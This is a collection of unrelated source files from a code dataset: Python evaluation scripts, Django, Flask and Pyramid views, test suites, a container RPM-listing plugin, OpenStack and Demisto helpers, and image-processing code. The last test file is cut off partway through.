{"seq_id":"64569498","text":"#Program which evaluates semeval 2019 task 6 output\n#Example run: python3 evaluate.py Kim-CNN_random_out english/agr_en_dev.csv\n\nimport sys\nimport csv\n\ndef evaluate(outputFile, goldFile):\n    output = {}\n    gold = {}\n    total = 0.0\n    correct = 0.0\n    classCor = {}\n    classAtt = {}\n    classTot = {}\n    \n    #Read in/store output \n    with open(outputFile, 'r') as csvfile:\n        outputreader = csv.reader(csvfile, delimiter=',')\n        for curOut in outputreader:\n            output[curOut[0].strip()] = curOut[1].strip()\n            if(curOut[1].strip() not in classCor):\n                classCor[curOut[1].strip()] = 0.0\n                classAtt[curOut[1].strip()] = 0.0\n                classTot[curOut[1].strip()] = 0.0\n\n    #Read in/store gold keys\n    with open(goldFile, 'r') as csvfile:\n        goldreader = csv.reader(csvfile, delimiter='\\t')\n        for curGold in goldreader:\n            gold[curGold[0].strip()] = curGold[3].strip()\n            if(curGold[3].strip() not in classCor):\n                classCor[curGold[3].strip()] = 0.0\n                classAtt[curGold[3].strip()] = 0.0\n                
classTot[curGold[3].strip()] = 0.0\n\n\n    #Compares each output to the corresponding gold standard, noting each correct\n    for curOut in output:\n        total += 1\n        classTot[gold[curOut]] += 1\n        classAtt[output[curOut]] += 1\n        \n        if(output[curOut] == gold[curOut]):\n            correct += 1\n            classCor[output[curOut]] += 1\n    \n    #calculate macro precision and recall, then macro f1 score\n    macroPrList = []\n    macroReList = [] \n    macroF1List = []\n    for c in classCor:\n        curMacroRe = classCor[c]/classTot[c]\n        curMacroPr = classCor[c]/classAtt[c]\n        curMacroF1 = 2 * (curMacroPr * curMacroRe)/(curMacroPr + curMacroRe)\n        macroPrList.append(curMacroPr)\n        macroReList.append(curMacroRe)\n        macroF1List.append(curMacroF1)\n\n    macroPr = sum(macroPrList)/len(macroPrList)\n    macroRe = sum(macroReList)/len(macroReList)\n    macroF1 = sum(macroF1List)/len(macroF1List) \n\n    print(\"Total correct for\", outputFile, \"-\\n Accuracy =\", correct/total, \"\\n Macro Precision =\", macroPr, \"\\n Macro Recall =\", macroRe, \"\\n Macro F1=\", macroF1 )\n\n\n\nevaluate(sys.argv[1], sys.argv[2])\n","sub_path":"evaluateB.py","file_name":"evaluateB.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"73666046","text":"from django.http import HttpResponse, HttpResponseRedirect\nfrom rest_framework import viewsets\nfrom .models import Question, Choice, Character\nfrom .serializers import QuestionSerializer, ChoiceSerializer, CharacterSerializer\n\n\nclass QuestionViewSet(viewsets.ModelViewSet):\n    queryset = Question.objects.all().order_by('id')\n    serializer_class = QuestionSerializer\n\n\nclass ChoiceViewSet(viewsets.ModelViewSet):\n    serializer_class = ChoiceSerializer\n    # default queryset; get_queryset() narrows it by the optional 'question' query param\n    queryset = Choice.objects.all().order_by('id')\n\n    def get_queryset(self):\n        queryset = Choice.objects.all()\n        question = self.request.query_params.get('question', None)\n        if question is not None:\n            queryset = queryset.filter(question=question)\n        return queryset\n","sub_path":"space_escape_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"340985493","text":"# -*- coding: utf-8 -*-\n__author__ = 'ffuentes'\n\nfrom django.conf import settings\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom graphene_django.views import GraphQLView\n\nfrom .core import *\nfrom .types import *\nfrom .query import *\nfrom .mutations import *\n\n_nimeta = getattr(NOCRootQuery, 'NIMeta')\ngraphql_types = getattr(_nimeta, 'graphql_types')\n\nNOCSCHEMA_TYPES = [\n    # Interfaces\n    NINode,\n\n    # common\n    User,\n    Dropdown,\n    Choice,\n    Neo4jChoice,\n    NodeHandler,\n] + graphql_types\n\nNOCSCHEMA_QUERIES = [\n    NOCRootQuery,\n]\n\nNOCSCHEMA_MUTATIONS = [\n    NOCRootMutation,\n]\n\n\ndef login_required_env(f):\n    # skip authentication to inspect graphql schema\n    if settings.INSPECT_SCHEMA:\n        return f\n    else:\n        return login_required(f)\n\n\n@method_decorator(login_required_env, name='dispatch')\nclass AuthGraphQLView(GraphQLView):\n    pass\n","sub_path":"src/niweb/apps/noclook/schema/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"434927169","text":"#!Python3\r\n#ImageArchimed - 
Lays out the source image along an Archimedean spiral\r\n\r\nimport os, numpy\r\nfrom PIL import Image\r\n\r\nF = round((1+numpy.sqrt(5))/2,3) #Golden ratio\r\nIMAGE_FILENAME = \"Arh.jpg\" #Name of the image file to open\r\nNUM_TURN = 8\r\n\r\n\r\nImage0 = Image.open(IMAGE_FILENAME) #Load the picture into Image0\r\nWidht_Im, Height_Im = Image0.size #Store the image dimensions\r\n\r\n#if Widht_Im <= Height_Im: #If the image is not horizontal, rotate it\r\n#    Image0 = Image0.rotate(90)\r\nXsize = [0, Widht_Im, ]\r\nYsize = [0, Height_Im, ]\r\nCycle = 0\r\n\r\nfor i in range(1,NUM_TURN): #Compute the coordinates where the spiral touches the rectangle\r\n    Xsize.append(round(int(Xsize[i] / F)))\r\n    Ysize.append(round(int(Ysize[i] / F)))\r\nprint(Xsize,\" \",Ysize)\r\nXcor = { #Empirically derived X coordinates of the points\r\n    0:0,\r\n    1:Xsize[1],\r\n    2:Xsize[1]-Xsize[2],\r\n    3:0,\r\n    4:Xsize[3],\r\n    5:Xsize[1]-Xsize[2],\r\n    6:Xsize[1]-Xsize[2]-Xsize[4],\r\n    7:Xsize[3]+Xsize[6]\r\n}\r\nYcor = { #Empirically derived Y coordinates of the points\r\n    0:0,\r\n    1:Ysize[2],\r\n    2:Ysize[1],\r\n    3:Ysize[1]-Ysize[3],\r\n    4:Ysize[2],\r\n    5:Ysize[2]+Ysize[4],\r\n    6:Ysize[1]-Ysize[3],\r\n    7:Ysize[2]+Ysize[4]\r\n}\r\nfor i in range(NUM_TURN):\r\n    print(\"{\",Xcor[i], \",\", Ycor[i],\"}\")\r\n    NewImage = Image0.copy()\r\nfor i in range(1,NUM_TURN):\r\n    NewImage = NewImage.resize((Xsize[i],Ysize[i]))\r\n    Image0.paste(NewImage.rotate(i*90,expand=True),(Xcor[i],Ycor[i]))\r\nImage0.show()","sub_path":"Spyral/ImageArchimed.py","file_name":"ImageArchimed.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"159523522","text":"import numpy as np\nimport unittest\nfrom yggdrasil.serialize import DefaultSerialize\nfrom yggdrasil.serialize.tests import test_SerializeBase as parent\n\n\nclass TestFunctionalSerialize(parent.TestSerializeBase):\n    r\"\"\"Test class for FunctionalSerialize.\"\"\"\n\n    _cls = 'FunctionalSerialize'\n    testing_option_kws = {'as_format': True}\n    \n    def __init__(self, *args, **kwargs):\n        super(TestFunctionalSerialize, self).__init__(*args, **kwargs)\n        self.func_serialize = self._func_serialize\n        self.func_deserialize = self._func_deserialize\n\n    def get_options(self):\n        r\"\"\"Get testing options.\"\"\"\n        out = {'kwargs': {'func_serialize': self.func_serialize,\n                          'func_deserialize': self.func_deserialize},\n               'empty': b'',\n               'objects': [['one', np.int32(1), 1.0],\n                           ['two', np.int32(2), 1.0]],\n               'extra_kwargs': {},\n               'typedef': {'type': 'bytes'},\n               'dtype': None,\n               'is_user_defined': True}\n        return out\n    \n    def _func_serialize(self, args): # pragma: no cover\n        r\"\"\"Method that serializes using repr.\"\"\"\n        return repr(args).encode(\"utf-8\")\n\n    def _func_deserialize(self, args): # pragma: no cover\n        r\"\"\"Method that deserializes using eval.\"\"\"\n        if len(args) == 0:\n            return self.testing_options['empty']\n        x = eval(args.decode(\"utf-8\"))\n        return x\n\n    def test_serialize_sinfo(self):\n        r\"\"\"Test serialize/deserialize with serializer info.\"\"\"\n        self.assert_raises(RuntimeError, self.instance.serialize,\n                           self.testing_options['objects'][0],\n                           add_serializer_info=True)\n        \n\nclass FakeSerializer(DefaultSerialize.DefaultSerialize):\n    r\"\"\"Fake serializer that mocks user defined serialization/deserialization\n    routines.\"\"\"\n\n    _dont_register = True\n\n    def func_serialize(self, args): # pragma: no cover\n        r\"\"\"Method that serializes using repr.\"\"\"\n        
return repr(args).encode(\"utf-8\")\n\n def func_deserialize(self, args): # pragma: no cover\n r\"\"\"Method that deserializes using eval.\"\"\"\n if len(args) == 0:\n return []\n x = eval(args.decode(\"utf-8\"))\n return x\n\n\nclass TestFunctionalSerialize_class(TestFunctionalSerialize):\n r\"\"\"Test class for FunctionalSerialize class with classes.\"\"\"\n\n def get_options(self):\n r\"\"\"Get testing options.\"\"\"\n temp_seri = FakeSerializer()\n assert(issubclass(temp_seri.__class__, DefaultSerialize.DefaultSerialize))\n out = super(TestFunctionalSerialize_class, self).get_options()\n out['kwargs'] = {'func_serialize': temp_seri,\n 'func_deserialize': temp_seri,\n 'encoded_datatype': {'type': 'bytes'}}\n return out\n \n\nclass TestFunctionalSerialize_error(TestFunctionalSerialize):\n r\"\"\"Test class for FunctionalSerialize class with incorrect functions.\"\"\"\n\n def _func_serialize(self, args):\n r\"\"\"Method that serializes using repr.\"\"\"\n return args\n\n def test_serialize(self):\n r\"\"\"Test serialize with function that dosn't return correct type.\"\"\"\n self.assert_raises(TypeError, self.instance.serialize, (1,))\n\n @unittest.skipIf(True, 'Error testing')\n def test_serialize_no_metadata(self):\n r\"\"\"Test serializing without metadata.\"\"\"\n pass # pragma: no cover\n \n @unittest.skipIf(True, 'Error testing')\n def test_serialize_header(self):\n r\"\"\"Disabled: Test serialize/deserialize with header.\"\"\"\n pass # pragma: no cover\n\n @unittest.skipIf(True, 'Error testing')\n def test_serialize_sinfo(self):\n r\"\"\"Disabled: Test serialize/deserialize with serializer info.\"\"\"\n pass # pragma: no cover\n\n @unittest.skipIf(True, 'Error testing')\n def test_field_specs(self):\n r\"\"\"Disabled: Test field specifiers.\"\"\"\n pass # pragma: no cover\n","sub_path":"yggdrasil/serialize/tests/test_FunctionalSerialize.py","file_name":"test_FunctionalSerialize.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"400959736","text":"\"\"\"\nCopyright (c) 2015 Red Hat, Inc\nAll rights reserved.\n\nThis software may be modified and distributed under the terms\nof the BSD license. 
See the LICENSE file for details.\n\"\"\"\nimport os\nimport subprocess\nimport tempfile\nimport tarfile\n\nfrom atomic_reactor.plugin import PostBuildPlugin\nfrom atomic_reactor.utils.rpm import rpm_qf_args, parse_rpm_output\nfrom atomic_reactor.plugins.pre_reactor_config import get_list_rpms_from_scratch\nfrom docker.errors import APIError\n\nRPMDB_PATH = '/var/lib/rpm'\nRPMDB_DIR_NAME = 'rpm'\nRPMDB_PACKAGES_NAME = 'Packages'\n\n__all__ = ('PostBuildRPMqaPlugin', )\n\n\nclass PostBuildRPMqaPlugin(PostBuildPlugin):\n key = \"all_rpm_packages\"\n is_allowed_to_fail = False\n sep = ';'\n\n def __init__(self, tasker, workflow, image_id, ignore_autogenerated_gpg_keys=True):\n \"\"\"\n constructor\n\n :param tasker: ContainerTasker instance\n :param workflow: DockerBuildWorkflow instance\n \"\"\"\n # call parent constructor\n super(PostBuildRPMqaPlugin, self).__init__(tasker, workflow)\n self.image_id = image_id\n self.ignore_autogenerated_gpg_keys = ignore_autogenerated_gpg_keys\n\n self._container_ids = []\n\n def run(self):\n # If another component has already filled in the image component list, skip\n if self.workflow.image_components is not None:\n return None\n\n if self.workflow.builder.dockerfile_images.base_from_scratch:\n if get_list_rpms_from_scratch(self.workflow):\n self.log.info(\"from scratch, list_rpms_from_scratch is True, trying get rpmdb\")\n plugin_output = self.gather_output_scratch()\n if not plugin_output:\n self.tasker.cleanup_containers(*self._container_ids)\n return None\n else:\n self.log.info(\"from scratch, but list_rpms_from_scratch is False, won't run rpmqa\")\n return None\n else:\n plugin_output = self.gather_output_non_scratch()\n\n # gpg-pubkey are autogenerated packages by rpm when you import a gpg key\n # these are of course not signed, let's ignore those by default\n if self.ignore_autogenerated_gpg_keys:\n self.log.debug(\"ignore rpms 'gpg-pubkey'\")\n plugin_output = [x for x in plugin_output if not x.startswith(\"gpg-pubkey\" + self.sep)]\n\n self.tasker.cleanup_containers(*self._container_ids)\n\n self.workflow.image_components = parse_rpm_output(plugin_output)\n\n return plugin_output\n\n def gather_output_non_scratch(self):\n for _ in range(5):\n container_id = self.tasker.run(\n self.image_id,\n command=rpm_qf_args(),\n create_kwargs={\"entrypoint\": \"/bin/rpm\", \"user\": \"root\"},\n start_kwargs={},\n )\n self._container_ids.append(container_id)\n self.tasker.wait(container_id)\n output = self.tasker.logs(container_id, stream=False)\n\n if output:\n return output\n\n raise RuntimeError('Unable to gather list of installed packages in container')\n\n def gather_output_scratch(self):\n container_dict = self.tasker.create_container(self.image_id, command=['/bin/bash'])\n container_id = container_dict['Id']\n self._container_ids.append(container_id)\n\n try:\n bits, _ = self.tasker.get_archive(container_id, RPMDB_PATH)\n except APIError as ex:\n self.log.info('Could not extract rpmdb in %s : %s', RPMDB_PATH, ex)\n return None\n except Exception as ex:\n self.log.info('Get archive failed while extracting rpmdb in %s : %s', RPMDB_PATH, ex)\n raise RuntimeError(ex) from ex\n\n with tempfile.NamedTemporaryFile() as rpmdb_archive:\n for chunk in bits:\n rpmdb_archive.write(chunk)\n rpmdb_archive.flush()\n tar_archive = tarfile.TarFile(rpmdb_archive.name)\n\n with tempfile.TemporaryDirectory() as rpmdb_dir:\n tar_archive.extractall(rpmdb_dir)\n\n rpmdb_path = os.path.join(rpmdb_dir, RPMDB_DIR_NAME)\n rpmdb_packages = os.path.join(rpmdb_path, 
RPMDB_PACKAGES_NAME)\n\n if not os.path.exists(rpmdb_packages):\n self.log.info('%s does not exist in rpmdb', RPMDB_PACKAGES_NAME)\n return None\n\n rpm_cmd = 'rpm --dbpath {} {}'.format(rpmdb_path, rpm_qf_args())\n try:\n self.log.info('getting rpms from rpmdb: %s', rpm_cmd)\n rpm_output = subprocess.check_output(rpm_cmd,\n shell=True, universal_newlines=True) # nosec\n except Exception as e:\n self.log.error(\"Failed to get rpms from rpmdb: %s\", e)\n raise e\n\n rpm_output = [line for line in rpm_output.splitlines() if line]\n return rpm_output\n","sub_path":"atomic_reactor/plugins/post_rpmqa.py","file_name":"post_rpmqa.py","file_ext":"py","file_size_in_byte":4969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"471922453","text":"import bisect\nimport random\nfrom itertools import accumulate\n\n\nclass Solution:\n def __init__(self, rects):\n self.a = [(x2 - x1 + 1) * (y2 - y1 + 1) for x1, y1, x2, y2 in rects]\n self.a = [i / sum(self.a) for i in accumulate(self.a)]\n self.r = rects\n\n def pick(self):\n d = random.random()\n t = bisect.bisect_left(self.a, d)\n x1, y1, x2, y2 = self.r[t]\n return random.randint(x1, x2), random.randint(y1, y2)\n\n\n# Your Solution object will be instantiated and called as such:\n# obj = Solution(rects)\n# param_1 = obj.pick()\n\nif __name__ == '__main__':\n o = Solution([[-2, -2, -1, -1], [1, 0, 3, 0]])\n print(o.pick())\n print(o.pick())\n print(o.pick())\n print(o.pick())\n","sub_path":"src/leetcode/P497.py","file_name":"P497.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"404753630","text":"from flask import Blueprint, jsonify, request, Response\n\nfrom project import db\nfrom project.api.models import Todo, User\n\n\ntodo_blueprint = Blueprint(\n \"todos\",\n __name__\n)\n\n\n@todo_blueprint.route(\"/api/todos\")\ndef get_todos():\n response = []\n todos = db.session.query(Todo).all()\n for todo in todos:\n response.append(todo.to_dict())\n return jsonify(response)\n\n\n@todo_blueprint.route(\"/api/todos/\")\ndef get_todo(todo_id):\n todo = Todo.query.filter_by(todo_id=todo_id).first()\n if not todo:\n return Response(status=404)\n return jsonify(todo.to_dict())\n\n\n@todo_blueprint.route(\"/api/todos/\", methods=[\"DELETE\"])\ndef delete_todo(todo_id):\n todo = Todo.query.filter_by(todo_id=todo_id).first()\n if not todo:\n return Response(status=404)\n db.session.delete(todo)\n db.session.commit()\n return Response(status=204)\n\n\n@todo_blueprint.route(\"/api/todos\", methods=[\"POST\", \"PUT\"])\ndef create_or_update_todo():\n response = {}\n request_json = request.get_json()\n\n import sys\n print(\"request data...\", request_json, file=sys.stderr)\n\n # Validation\n keys = [\"title\", \"content\", \"completed\", \"dueDate\", \"priority\"]\n if request.method == \"PUT\":\n keys.append(\"todoId\")\n for key in keys:\n if key not in request_json:\n response[\"message\"] = \"Missing {key} in request body\".format(key=key)\n return jsonify(response), 400\n\n user_id = request_json.get(\"userId\")\n if user_id:\n user = User.query.filter_by(user_id=user_id).first()\n if not user:\n response[\"message\"] = \"User not found\"\n return jsonify(response), 404\n\n # Parse the request data\n todo = None\n if request.method == \"POST\":\n todo = Todo()\n elif request.method == \"PUT\":\n todo_id = int(request_json[\"todoId\"])\n todo = Todo.query.filter_by(todo_id=todo_id).first()\n if not todo:\n 
response[\"message\"] = \"Todo not found\"\n return jsonify(response), 404\n\n todo.title = request_json[\"title\"]\n todo.content = request_json[\"content\"]\n todo.completed = request_json[\"completed\"]\n todo.due_date = request_json[\"dueDate\"]\n todo.priority = request_json[\"priority\"]\n if \"userId\" in request_json:\n todo.user_id = user_id\n\n if request.method == \"POST\":\n db.session.add(todo)\n response[\"message\"] = \"Todo created successfully\"\n elif request.method == \"PUT\":\n response[\"message\"] = \"Todo updated successfully\"\n db.session.commit()\n response[\"todoId\"] = todo.todo_id\n\n return jsonify(response), 201\n","sub_path":"server/project/api/todo_routes.py","file_name":"todo_routes.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"569906708","text":"import ast\nimport logging\nfrom pprint import pformat\n\nimport demisto_client\n\n\ndef update_server_configuration(client, server_configuration, error_msg):\n \"\"\"updates server configuration\n\n Args:\n client (demisto_client): The configured client to use.\n server_configuration (dict): The server configuration to be added\n error_msg (str): The error message\n\n Returns:\n response_data: The response data\n status_code: The response status code\n \"\"\"\n logging.debug(f'Updating server configurations with {pformat(server_configuration)}')\n system_conf_response = demisto_client.generic_request_func(\n self=client,\n path='/system/config',\n method='GET'\n )\n system_conf = ast.literal_eval(system_conf_response[0]).get('sysConf', {})\n logging.debug(f'Current server configurations are {pformat(system_conf)}')\n system_conf.update(server_configuration)\n data = {\n 'data': system_conf,\n 'version': -1\n }\n response_data, status_code, _ = demisto_client.generic_request_func(self=client, path='/system/config',\n method='POST', body=data)\n\n try:\n result_object = ast.literal_eval(response_data)\n logging.debug(f'Updated server configurations with response: {pformat(result_object)}')\n except ValueError as err:\n logging.exception('failed to parse response from demisto. response is {}.\\nError:\\n{}'.format(response_data, err))\n return\n\n if status_code >= 300 or status_code < 200:\n message = result_object.get('message', '')\n logging.error(f'{error_msg} {status_code}\\n{message}')\n return response_data, status_code\n","sub_path":"Tests/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"415079272","text":"from pyramid.view import view_config\n\nfrom pyramid.httpexceptions import (\n HTTPFound\n)\n\nfrom .auth import restrict_access\nfrom .. 
import models\n\n\n@view_config(\n    route_name='admin_team',\n    renderer='../templates/event.jinja2',\n    request_method=\"POST\"\n)\n@restrict_access()\ndef admin_team_edit(request):\n\n    if 'form.submitted' in request.params:\n        team_id = request.params['id']\n        member = request.params['member']\n        team = request.dbsession.query(models.Team).get(team_id)\n        action = request.params['form.submitted']\n        if action == \"add\":\n            team_list = list(team.winners)\n            team_list.append(member)\n            team.winners = team_list\n        if action == \"remove\":\n            team_list = list(team.winners)\n            team_list.remove(member)\n            team.winners = team_list\n\n    return HTTPFound(\n        location=request.route_url('event', id=request.params['event_id'])\n    )\n","sub_path":"pubg_project/views/admin_team.py","file_name":"admin_team.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"490978028","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\n\n\nimport time\nfrom tests import *\n\n# Get account0 to use as the test account\nprint(u'\\n\\nQuerying accounts...')\naccounts = utils.accounts()\naccount0 = accounts[0]\nprint(u'Account addresses: ', accounts)\n\n# Deploy the management contract\nstatus_mgmt, mgmt_contract_address = utils.deploy_mgmt_contract(account0)\n# Management contract deployed\n\n# Deploy the logic (upgrade) contract\nstatus, logic_contract_address = utils.deploy_logic_contract(account0)\n# Logic contract deployed\n\n\n#######\nprint(u'\\n\\nSending a request to set the upgrade contract address...')\nnew_address = logic_contract_address[3:]\nmgmt.send_request(mgmt_contract_address, account0, new_address);\n#######\n\n\nprint(u'\\n\\n\\n====================================Test start====================================')\n# Vote\nprint(u'\\n\\nManagement contract has expired; sending another vote request...')\ntime.sleep(1 * 60)\nmgmt.vote(mgmt_contract_address, account0);\n#######\n","sub_path":"tests/test_mgmt_vote_expired.py","file_name":"test_mgmt_vote_expired.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"16055937","text":"import inspect\nfrom contextvars import ContextVar\nfrom enum import Enum\nfrom fnmatch import fnmatch\nfrom typing import Any, Callable, Dict, List, Mapping, Optional, Tuple\nfrom urllib.parse import ParseResult, urlparse\n\nfrom fastapi.routing import APIRouter\nfrom httpx import URL\nfrom pydantic import AnyHttpUrl\nfrom pydantic.errors import UrlHostError\nfrom starlette.datastructures import Headers, MutableHeaders\n\nfrom .cache import endpoint_cache\nfrom .net import AsyncHTTPClient\n\n\ndef exclude_params(func: Callable, params: Mapping[str, Any]) -> Dict[str, Any]:\n    func_params = inspect.signature(func).parameters\n    return {k: v for k, v in params.items() if k in func_params}\n\n\nclass SlashRouter(APIRouter):\n    def api_route(self, path: str, **kwargs):\n        path = path if path.startswith(\"/\") else (\"/\" + path)\n        return super().api_route(path, **kwargs)\n\n\nclass EndpointMeta(type):\n    def __new__(cls, name: str, bases: Tuple[type, ...], namespace: Dict[str, Any]):\n        for name, func in namespace.items():\n            if name.startswith(\"_\") or not inspect.iscoroutinefunction(func):\n                continue\n            namespace[name] = endpoint_cache(func)\n        return super().__new__(cls, name, bases, namespace)\n\n\nclass BaseEndpoint(metaclass=EndpointMeta):\n    def __init__(self, client: AsyncHTTPClient):\n        self.client = client\n\n    @staticmethod\n    def _join(base: str, endpoint: str, params: Dict[str, Any]) -> URL:\n        host: ParseResult = urlparse(base)\n        params = {\n            k: (v.value if isinstance(v, Enum) else v)\n            for k, v in params.items()\n            if v is 
not None\n }\n return URL(\n url=ParseResult(\n scheme=host.scheme,\n netloc=host.netloc,\n path=endpoint.format(**params),\n params=\"\",\n query=\"\",\n fragment=\"\",\n ).geturl(),\n params=params,\n )\n\n\nclass BaseHostUrl(AnyHttpUrl):\n allowed_hosts: List[str] = []\n\n @classmethod\n def validate_host(\n cls, parts: Dict[str, str]\n ) -> Tuple[str, Optional[str], str, bool]:\n host, tld, host_type, rebuild = super().validate_host(parts)\n if not cls._check_domain(host):\n raise UrlHostError(allowed=cls.allowed_hosts)\n return host, tld, host_type, rebuild\n\n @classmethod\n def _check_domain(cls, host: str) -> bool:\n return any(\n filter(\n lambda x: fnmatch(host, x), # type:ignore\n cls.allowed_hosts,\n )\n )\n\n\nrequest_headers = ContextVar(\"request_headers\", default=Headers())\nresponse_headers = ContextVar(\"response_headers\", default=MutableHeaders())\n","sub_path":"hibiapi/utils/routing.py","file_name":"routing.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"127377552","text":"# coding=utf-8\n\"\"\"OpenStack utilities\"\"\"\n# Absolute import required on Python 2 to avoid collision\n# of this module with openstack-sdk package\nfrom __future__ import absolute_import\n\nfrom contextlib import contextmanager\n\nimport keystoneauth1.exceptions.http as keystoneauth_exceptions\nfrom openstack.exceptions import SDKException\nfrom openstack.connection import Connection\n\nfrom apyfal.exceptions import AcceleratorException\n\n\nclass ExceptionHandler:\n \"\"\"Handler for OpenStack exceptions.\"\"\"\n # Needs to be overridden with exceptions to re-raises\n RUNTIME = AcceleratorException\n AUTHENTICATION = AcceleratorException\n\n @classmethod\n @contextmanager\n def catch(cls, to_catch=SDKException, to_raise=None, ignore=False, **exc_kwargs):\n \"\"\"\n Context manager that catch OpenStack exceptions and raises\n Apyfal exceptions.\n\n Args:\n to_catch (Exception or tuple of Exception): Exception to catch.\n SDKException if not specified.\n to_raise (apyfal.exception.AcceleratorException subclass):\n Exception to raise. 
self.RUNTIME if not specified.\n ignore (bool): If True, don't raises exception.\n exc_kwargs: Exception to raise arguments.\n \"\"\"\n # Performs operation\n try:\n yield\n\n # Catch authentication exceptions\n except keystoneauth_exceptions.Unauthorized as exception:\n raise cls.AUTHENTICATION(exc=exception)\n\n # Catch specified exceptions\n except to_catch as exception:\n # Raises Apyfal exception\n if not ignore:\n raise (to_raise or cls.RUNTIME)(exc=exception, **exc_kwargs)\n\n\ndef connect(region, auth_url, client_id, secret_id, project_id, interface):\n \"\"\"\n Connect to OpenStack.\n\n Args:\n region (str): OpenStack region.\n auth_url (str): OpenStack auth_url.\n client_id (str): OpenStack client ID.\n secret_id (str): OpenStack secret ID.\n project_id (str): OpenStack project ID.\n interface (str): OpenStack interface.\n\n Returns:\n Connection: OpenStack connection.\n \"\"\"\n return Connection(\n region_name=region,\n auth=dict(\n auth_url=auth_url, username=client_id,\n password=secret_id, project_id=project_id),\n compute_api_version='2', identity_interface=interface)\n","sub_path":"apyfal/_utilities/openstack.py","file_name":"openstack.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"29062329","text":"import json\nfrom django.test import TestCase\nfrom django.test.client import Client\nfrom django.core.urlresolvers import reverse\n\nfrom common.models import *\nfrom common.views import *\n\nclass ModelTestCase(TestCase):\n fixtures = ['test_common.yaml']\n\n def testQuestBasics(self):\n # unsolved quest\n q = Quest.objects.get(pk=1)\n self.assertFalse(q.check_all_solved())\n self.assertEqual(q.questtask_set.count(), 3)\n self.assertEqual(q.questtask_set.filter(solved=True).count(), 1)\n \n # answer all questions\n for qt in q.questtask_set.all():\n qt.solved = True\n qt.save()\n \n # check that quest is now solved\n self.assertEqual(q.questtask_set.filter(solved=True).count(), 3)\n self.assertTrue(q.check_all_solved())\n \n def testQuestTaskBasics(self):\n qt = QuestTask.objects.get(pk=1)\n self.assertEqual(qt.incorrect_answers().count(), 0)\n\n for i in range(3):\n answer = GuessAttempt(quest_task = qt, answer = str(i), host = '127.0.0.1')\n answer.save()\n \n self.assertEqual(qt.incorrect_answers().count(), 3)\n \n\nclass ViewTestCase(TestCase):\n fixtures = ['test_common.yaml']\n \n def testHome(self):\n \"\"\"Check that home page contains all quests\"\"\"\n response = self.client.get(reverse('home'))\n for q in Quest.objects.all():\n self.assertContains(response, q.summary)\n\n def testQuestShow(self):\n \"\"\"Check that quest page contains all quest questions\"\"\"\n q = Quest.objects.get(pk=1)\n response = self.client.get(reverse('quest_show', kwargs={'quest_id': q.id}))\n \n # check that page contains quest summary and description but not answer\n self.assertContains(response, q.summary)\n self.assertContains(response, q.description)\n self.assertNotContains(response, q.answer)\n \n # check for all questions\n for qt in q.questtask_set.all():\n self.assertContains(response, qt.question)\n \n # answer all questions\n for qt in q.questtask_set.all():\n qt.solved = True\n qt.save()\n\n # check that quest is now solved\n self.assertTrue(q.check_all_solved())\n\n # check that all questions are still on the page\n response = self.client.get(reverse('quest_show', kwargs={'quest_id': q.id}))\n self.assertContains(response, qt.question)\n self.assertContains(response, 
qt.answer)\n\n\n\n    def testAnswerIsWrong(self):\n        \"\"\"Check invalid input and valid but wrong answers to quest tasks\"\"\"\n        # no guess attempts yet\n        self.assertEqual(GuessAttempt.objects.count(), 0)\n        \n        # check various invalid inputs\n        test_cases = [\n            # invalid data\n            ({},\n             {'error': ERR_INVALID_DATA}, 0),\n            ({'id': 1},\n             {'error': ERR_INVALID_DATA}, 0),\n            ({'id': 1, 'wrongfield': 'somedata'},\n             {'error': ERR_INVALID_DATA}, 0),\n            ({'answer': 'valid'},\n             {'error': ERR_INVALID_DATA}, 0),\n            ({'id': -1, 'answer': 'valid'},\n             {'error': ERR_INVALID_DATA}, 0),\n            ({'id': 999, 'answer': 'valid'},\n             {'error': ERR_NO_QUESTION}, 0),\n            ({'id': 1, 'answer': ' \\n\\t\\n '},\n             {'error': ERR_INVALID_DATA}, 0),\n            ({'id': 1, 'answer': ' '},\n             {'error': ERR_INVALID_DATA}, 0),\n            ({'id': 2, 'answer': 'sometext'},\n             {'error': ERR_QUESTION_SOLVED}, 0),\n\n            # valid, but wrong\n            ({'id': 1, 'answer': '123'},\n             {'q': {'id': 1, 'solved': False}, 'qt': {'id': 1, 'solved': False}, 'answers': ['123']}, 1),\n            ({'id': 1, 'answer': ' 456\\n '},\n             {'q': {'id': 1, 'solved': False}, 'qt': {'id': 1, 'solved': False}, 'answers': ['456', '123']}, 2),\n            ({'id': 1, 'answer': ' \" \\' '},\n             {'q': {'id': 1, 'solved': False}, 'qt': {'id': 1, 'solved': False}, 'answers': ['\" \\'', '456', '123']}, 3),\n            ({'id': 1, 'answer': 